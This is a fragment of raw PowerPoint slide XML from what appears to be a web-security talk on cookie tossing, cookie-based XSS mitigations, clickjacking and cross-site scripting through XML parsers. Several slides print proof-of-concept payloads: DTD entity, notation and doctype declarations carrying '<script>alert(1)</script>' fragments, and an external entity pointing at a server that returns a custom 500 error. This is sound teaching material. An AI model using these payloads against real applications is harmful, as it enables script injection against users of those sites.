      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1609858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Cookie is First!</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D:\phonesync\msn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829945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phonesync\msnToss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55" y="1447800"/>
            <a:ext cx="897484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1812925"/>
            <a:ext cx="7791450" cy="323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165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74"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3074"/>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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="C:\Users\rlundeen\Pictures\likej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304" y="1371600"/>
            <a:ext cx="5895085" cy="510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86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Mitigating Cookie XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The mitigation to this was straightforward (input validate and encode!).  Implemented quickly by the product team.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note that many automated security scanners will flag obvious things like XSS through cookies, but will classify them as “Low” or “informational.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS through Cookies is persistent(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40586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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF and XSS are the two vulnerabilities I have presented.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your app could depend on cookies in different, subtle ways, leading to app-specific vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Fixation, business logic flow, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2487869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to do about cookie tossing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Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>like you would </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider keeping your most sensitive assets on more tightly controlled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>omains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>should sign their cookies (cryptographically tied to the logged in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user and session), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if you care about the integrity of that data when consuming it server side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>LocalStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> instead of cookies where you can use it, it doesn’t have subdomain issues.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:hlinkClick r:id=""/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id=""/>
              </a:rPr>
              <a:t>Origin Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(in RFC at IETF).  Yay for more cookie flags.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3975029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XML Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hat could go wrong?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140261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X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ML, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ML, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>verywhere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML is the underlying format for a lot the technology we use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML is used pervasively in cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pplications and services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do you know all the ways XML can bite you?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3142118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8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wait.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Are there really </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eatures that take user-controlled XML?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1140818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0"/>
            <a:ext cx="906119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48714" y="2628900"/>
            <a:ext cx="6209486" cy="2019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76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047750"/>
            <a:ext cx="90678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28800" y="4267200"/>
            <a:ext cx="6781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10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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What Happens if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>arses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ntrusted XML?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="C:\Users\jesseou.REDMOND\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LB74UYBA\MC90044190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581400"/>
            <a:ext cx="2643188" cy="312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348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Quick Note</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="7696200" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Will only be talking about Cross-Site Scripting (XSS) vectors using XML/XSL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152412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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://www.itwasntme.co.uk/blogs/wp-content/plugins/rss-poster/cache/675e7_tsunami-whale-surv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5867400" cy="508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63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Cross-Site Scripting with XML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8305800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perhaps getting client-side JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to execute within a domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is more valuable than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoSing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the server or reading files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you can upload/download XML files, you may have a stored XSS issue anyways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3961613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0800"/>
            <a:ext cx="8229600" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>the XML is only parsed and not stored?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="924935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DTD Cross-Site Scripting Leveraging System.XML Exception Messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="8229600" cy="685799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Ignore the XML Parsing stuff, what’s still wrong with this code?</a:t>
            </a:r>
            <a:endParaRPr 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2438400"/>
            <a:ext cx="809061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440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Technique 1 - Cross-Site Scripting using URL Fragments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1535113"/>
            <a:ext cx="6477000" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Illegal URL Fragments in system identifiers:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2362201"/>
            <a:ext cx="7162800" cy="2057400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>&lt;!DOCTYPE billion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t>SYTEM "#&lt;script&gt;alert(1)&lt;/script&gt;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>ENTITY foo SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t>"#&lt;script&gt;alert(1)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>&lt;!NOTATION GIF SYSTEM "#&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t>script&gt;alert(1)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>script&gt;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>&lt;bar&gt;&amp;foo;&lt;/bar&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="5257800"/>
            <a:ext cx="5410200" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Fragment identifier '#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>script&gt;alert(1)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>' cannot be part of the system identifier '#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>script&gt;alert(1)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Down Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3661311" y="4419600"/>
            <a:ext cx="3429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048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Technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - Cross-Site Scripting using 500s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216025" y="1535113"/>
            <a:ext cx="5641975" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Using Custom HTTP 500 Error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>essages:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="2590801"/>
            <a:ext cx="4267200" cy="1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;!DOCTYPE billion [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;!ENTITY foo SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>http://reachableserver.com/returnCustom500.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;bar&gt;&amp;foo;&lt;/bar&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="5091255"/>
            <a:ext cx="7848600" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The remote server returned an error: </a:t>
            </a:r>
            <a:r>
